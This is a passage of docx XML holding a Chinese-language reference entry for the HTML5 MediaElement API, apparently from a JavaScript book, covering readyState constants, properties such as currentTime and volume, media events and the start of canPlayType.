        <w:t>当前元素没有使用网络，因为它找不到可以播放的媒体资源。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short HAVE_NOTHING=0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>没有媒体数据或无数据已加载。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short HAVE_METADATA=1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>媒体元数据已加载，但当前播放位置的数据还没有加载。这意味着可以查询该媒体的时长或视频的大小，并且可以通过设置</w:t>
      </w:r>
      <w:r>
        <w:t>currentTime</w:t>
      </w:r>
      <w:r>
        <w:t>来搜索媒体，但浏览器现在不能播放</w:t>
      </w:r>
      <w:r>
        <w:t>currentTime</w:t>
      </w:r>
      <w:r>
        <w:t>位置的媒体。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short HAVE_CURRENT_DATA=2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>currentTime</w:t>
      </w:r>
      <w:r>
        <w:t>的媒体已加载，但还没有加载足够的数据以允许媒体开始播放。对视频来说，通常这意味着当前帧已加载，但下一帧还没有。在音频或视频的结尾也会发生这个状态。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short HAVE_FUTURE_DATA=3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>已下载</w:t>
      </w:r>
      <w:r>
        <w:t>了足以开始播放的媒体数据，但如果不暂停以便加载更多数据的话，数据可能将不足以持续播放到媒体结束。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short HAVE_ENOUGH_DATA=4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>已加载了足够的数据，浏览器有可能可以在不暂停的情况下一直播放到媒体结束。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>boolean autoplay</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>如果为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，对应媒体元素将在下载了足够数据时自动开始播放。本属性为对应的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML autoplay</w:t>
      </w:r>
      <w:r>
        <w:t>属性的映射。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly TimeRanges buffered</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前缓存的媒体数据的时间范围。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">boolean </w:t>
      </w:r>
      <w:r>
        <w:t>controls</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，则对应媒体元素应该显示一系列的播放控件。本属性为对应的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML controls</w:t>
      </w:r>
      <w:r>
        <w:t>属性的映射。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly string currentSrc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>媒体数据的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>，来自</w:t>
      </w:r>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:r>
        <w:t>属性，或者当前元素的一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>source</w:t>
      </w:r>
      <w:r>
        <w:t>＞子节点，如果没有指定媒体数据，则为空字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>double currentTime</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前播放时间，单位为秒。设置这个属性将使媒体元素跳到一个新的播放位置。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>double defaultPlaybackRate</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>正常播放的播放速度。默认值为</w:t>
      </w:r>
      <w:r>
        <w:t>1.0</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonl</w:t>
      </w:r>
      <w:r>
        <w:t>y double duration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>当前媒体的时长，单位为秒。如果长度未知（比如元数据还没有加载），这个属性将为</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>。如果媒体为一个不确定长度的流，则这个属性将为</w:t>
      </w:r>
      <w:r>
        <w:t>Infinity</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly boolean ended</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果已到达媒体的结尾则本属性为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly MediaError error</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>发生错误时会设置这个属性，其他情况下它为</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>。它指代一个对象，该对象的</w:t>
      </w:r>
      <w:r>
        <w:t>code</w:t>
      </w:r>
      <w:r>
        <w:t>属性描述错误的种类。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly double initialTime</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>初始播放位置，单位为秒。这个</w:t>
      </w:r>
      <w:r>
        <w:t>属性通常为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>，但有些媒体（比如流媒体）可能有不同的起点。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>boolean loop</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，则当前媒体元素将在每次到达结尾时自动重新开始。本属性是</w:t>
      </w:r>
      <w:r>
        <w:t>HTML loop</w:t>
      </w:r>
      <w:r>
        <w:t>属性的映射。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>boolean muted</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>指定当前音频是否静音。可以通过设置这个属性来让一段音频静音或取消静音。对＜</w:t>
      </w:r>
      <w:r>
        <w:t>video</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素而言，可以用一个</w:t>
      </w:r>
      <w:r>
        <w:t>audio="muted"</w:t>
      </w:r>
      <w:r>
        <w:t>属性来让媒体默认静音。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly unsigned short networkState</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前是否正在加载媒体数据。合法的值在上面常量部分列出了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly boolean paused</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果当前播放暂停了则此属性为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>double playbackRate</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前播放速度。</w:t>
      </w:r>
      <w:r>
        <w:t>1.0</w:t>
      </w:r>
      <w:r>
        <w:t>是正常播放。如果值大于</w:t>
      </w:r>
      <w:r>
        <w:t>1.0</w:t>
      </w:r>
      <w:r>
        <w:t>表示快进。值在</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>1.0</w:t>
      </w:r>
      <w:r>
        <w:t>之间表示慢放。如果值小于</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>，则媒体将回放。（回放时，媒体总是处于静音状态，同时，如果播放速度特别快或特别慢也将静音。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly TimeRanges played</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>已经播放的时间范围。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string preload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>这个属性是同名的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性的映射，可以通过它设置在用户请求媒体播放之前，浏览器应该获</w:t>
      </w:r>
      <w:r>
        <w:t>取多少媒体数据。值</w:t>
      </w:r>
      <w:r>
        <w:t>"none"</w:t>
      </w:r>
      <w:r>
        <w:t>表示不需要预加载数据。值</w:t>
      </w:r>
      <w:r>
        <w:t>"metadata"</w:t>
      </w:r>
      <w:r>
        <w:t>表示浏览器应该取得媒体的元数据（例如时间长度），但不用获取实际的数据本身。值</w:t>
      </w:r>
      <w:r>
        <w:t>"auto"</w:t>
      </w:r>
      <w:r>
        <w:t>（或者空字符串，如果设置</w:t>
      </w:r>
      <w:r>
        <w:t>preload</w:t>
      </w:r>
      <w:r>
        <w:t>属性但是没有指定值）表示一旦用户决定播放该媒体，浏览器可以加载整个媒体资源。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly unsigned short readyState</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>媒体播放的准备状态，基于已缓存的数据的数量。合法的值为上面定义的以</w:t>
      </w:r>
      <w:r>
        <w:t>HAVE_</w:t>
      </w:r>
      <w:r>
        <w:t>开头的常量。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly TimeRanges seekable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>可设置</w:t>
      </w:r>
      <w:r>
        <w:t>curre</w:t>
      </w:r>
      <w:r>
        <w:t>ntTime</w:t>
      </w:r>
      <w:r>
        <w:t>的时间范围。播放简单媒体文件时，这个值一般为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>duration</w:t>
      </w:r>
      <w:r>
        <w:t>之间的一个时间。但对流媒体而言，过去的时间可能不再在缓存中，将来的时间可能还不可用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly boolean seeking</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当媒体元素正在切换到一个新的</w:t>
      </w:r>
      <w:r>
        <w:t>currentTime</w:t>
      </w:r>
      <w:r>
        <w:t>播放位置时，本属性为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。如果新的播放位置已经在缓存中，这个属性将只有很短的一段时间为</w:t>
      </w:r>
      <w:r>
        <w:t>tr ue</w:t>
      </w:r>
      <w:r>
        <w:t>。但如果媒体元素必须加载新的媒体数据的话，</w:t>
      </w:r>
      <w:r>
        <w:t>seeking</w:t>
      </w:r>
      <w:r>
        <w:t>将保持</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>状态一段较长的时间。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>string src</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个属性是媒体元素的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML src</w:t>
      </w:r>
      <w:r>
        <w:t>属性的映射。通过设置这个属性，可让媒体元素加载新的媒体数据。注意这个属性和</w:t>
      </w:r>
      <w:r>
        <w:t>currentSrc</w:t>
      </w:r>
      <w:r>
        <w:t>不一样。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly Date startOffsetTime</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>播放时间为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>的位置对应的真实时间的日期及时间，如果媒体的元数据包含这个信息的话。（比如，视频文件可能包含录制它的时间。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>double volume</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个属性查询或设置音频播放的音量。它的值应该在</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>之间。也可参见</w:t>
      </w:r>
      <w:r>
        <w:t>muted</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</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w:t>
      </w:r>
      <w:r>
        <w:t>audio</w:t>
      </w:r>
      <w:r>
        <w:t>＞和＜</w:t>
      </w:r>
      <w:r>
        <w:t>video</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签定义了下面这些事件处理程序，它们都可以作为</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性或</w:t>
      </w:r>
      <w:r>
        <w:t>JavaS</w:t>
      </w:r>
      <w:r>
        <w:t>cript</w:t>
      </w:r>
      <w:r>
        <w:t>属性使用。在写作本书时，有一些浏览器还不支持这些属性，需要使用</w:t>
      </w:r>
      <w:r>
        <w:t>addEventListener()</w:t>
      </w:r>
      <w:r>
        <w:t>（参见</w:t>
      </w:r>
      <w:r>
        <w:t>EventTarget</w:t>
      </w:r>
      <w:r>
        <w:t>）来注册事件处理程序。媒体事件不会冒泡，也没有可取消的默认行为。相关的事件对象是一个常规的</w:t>
      </w:r>
      <w:r>
        <w:t>Event</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251781120" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4119113" cy="5072332"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="125" name="00125.jpeg" descr="00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5.jpeg" descr="00125.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId128"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4119113" cy="5072332"/>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82144" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4067354" cy="806569"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="126" name="00126.jpeg" descr="00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6.jpeg" descr="00126.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId129"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4067354" cy="806569"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string canPlayType(string type)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个访问询问媒体元素它是否能播放指定</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">MIME </w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>的媒体。如果播放器确定不能播放这个类型，它将返回空字符串。如果它认为自己可以（但不确定）播放这个类型，它将返回字符串</w:t>
